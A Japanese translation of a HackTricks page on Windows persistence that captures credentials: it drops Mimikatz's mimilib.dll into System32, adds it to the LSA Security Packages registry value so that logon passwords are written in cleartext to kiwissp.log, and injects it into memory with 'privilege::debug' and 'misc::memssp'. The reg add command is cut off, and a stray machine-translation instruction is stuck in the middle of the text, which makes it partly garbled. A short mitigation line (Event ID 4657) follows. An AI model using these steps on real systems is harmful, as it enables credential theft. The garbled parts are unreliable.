4.9 KiB
AWSハッキングをゼロからヒーローまで学ぶ htARTE (HackTricks AWS Red Team Expert)!
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告掲載したい場合やHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください。
- 公式PEASS & HackTricksグッズを入手する
- The PEASS Familyを発見し、独占的なNFTsのコレクションをチェックする
- 💬 Discordグループやtelegramグループに参加するか、Twitter 🐦 @carlospolopmをフォローする。
- HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングテクニックを共有する。
カスタムSSP
SSP(セキュリティサポートプロバイダ)とは何かこちらで学ぶ。
マシンへのアクセスに使用されるクレデンシャルをクリアテキストでキャプチャするために、独自のSSPを作成できます。
Mimilib
Mimikatzによって提供されるmimilib.dll
バイナリを使用できます。これは、クリアテキストでのすべてのクレデンシャルをファイル内に記録します。
C:\Windows\System32\
にdllをドロップします。
既存のLSAセキュリティパッケージのリストを取得します:
{% code title="attacker@target" %}
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
{% endcode %}
mimilib.dll
をセキュリティサポートプロバイダリスト(セキュリティパッケージ)に追加します:
PS C:\> reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
以下は、Windowsの強化に関するハッキング技術についてのハッキング書籍の内容です。関連する英語テキストを日本語に翻訳し、まったく同じマークダウンおよびHTML構文を保持して翻訳を返してください。コード、ハッキング技術名、ハッキング用語、クラウド/SaaSプラットフォーム名(Workspace、aws、gcpなど)、'leak'という単語、ペネトレーションテスト、およびマークダウンタグなどの翻訳は行わないでください。また、翻訳とマークダウン構文以外の余分なものは追加しないでください。
そして、再起動後には、C:\Windows\System32\kiwissp.log
に平文の資格情報が見つかります。
メモリ内
Mimikatzを使用してこれを直接メモリに注入することもできます(少し不安定になったり機能しない可能性があることに注意してください):
privilege::debug
misc::memssp
この操作は再起動後には維持されません。
対策
イベントID 4657 - HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages
の作成/変更を監査
htARTE (HackTricks AWS Red Team Expert)でAWSハッキングをゼロからヒーローまで学ぶ
HackTricksをサポートする他の方法:
- HackTricksにあなたの会社を広告したい、またはHackTricksをPDFでダウンロードしたい場合は、サブスクリプションプランをチェックしてください!
- 公式PEASS & HackTricksグッズを入手する
- The PEASS Familyを発見する、私たちの独占的なNFTsのコレクション
- 💬 Discordグループやテレグラムグループに参加する、またはTwitter 🐦 @carlospolopmをフォローする。
- HackTricksとHackTricks CloudのgithubリポジトリにPRを提出して、あなたのハッキングのコツを共有する。